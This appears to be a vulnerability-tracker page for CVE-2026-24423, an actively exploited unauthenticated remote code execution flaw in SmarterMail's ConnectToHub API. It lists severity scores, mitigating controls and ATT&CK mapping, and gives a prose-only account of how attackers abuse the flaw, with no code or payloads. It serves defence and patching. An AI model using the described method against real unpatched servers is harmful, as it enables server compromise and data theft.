CVE-2026-24423

CriticalCISA KEVActive ExploitationPublic PoCRansomware-linked

Published: 23 January 2026

Published

23 January 2026

Modified

06 February 2026

KEV Added

05 February 2026

Patch

—

CVSS Score 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS Score 0.8065 99.2th percentile

Risk Priority 88 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-24423 is a critical-severity Missing Authentication for Critical Function (CWE-306) vulnerability in Smartertools Smartermail. Its CVSS base score is 9.8 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 0.8% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190). What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-2 Flaw Remediation good match

prevent

Timely flaw remediation through vendor patching to build 9511 or later directly eliminates the unauthenticated RCE vulnerability in ConnectToHub as recommended in advisories.

SI-10 Information Input Validation good match

prevent

Information input validation prevents the execution of malicious OS commands received from untrusted HTTP servers targeted by the ConnectToHub API.

AC-14 Permitted Actions Without Identification or Authentication partial match

prevent

Defining and limiting permitted actions without identification or authentication directly mitigates CWE-306 missing authentication for the critical ConnectToHub function.

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

attack.mitre.org →

Why these techniques?

The vulnerability is an unauthenticated RCE in a public-facing webmail application (SmarterMail), directly enabling exploitation of public-facing applications via the ConnectToHub API.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

NVD Description

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be…

executed by the vulnerable application.

Deeper analysisAI

CVE-2026-24423 is an unauthenticated remote code execution vulnerability in SmarterTools SmarterMail versions prior to build 9511. The issue affects the ConnectToHub API method, stemming from CWE-306 (Missing Authentication for Critical Function). It carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), indicating critical severity due to its network accessibility, low complexity, and lack of prerequisites.

An unauthenticated remote attacker can exploit the vulnerability by tricking the SmarterMail instance into connecting to a malicious HTTP server controlled by the attacker. The server then delivers a malicious OS command, which the vulnerable application executes with the privileges of the SmarterMail process, enabling full server compromise including data exfiltration, modification, or disruption.

Advisories from VulnCheck and Code White detail the flaw, while SmarterTools release notes address it in build 9511 and later, recommending immediate upgrades for mitigation. The vulnerability appears in the CISA Known Exploited Vulnerabilities Catalog, underscoring the need for urgent patching.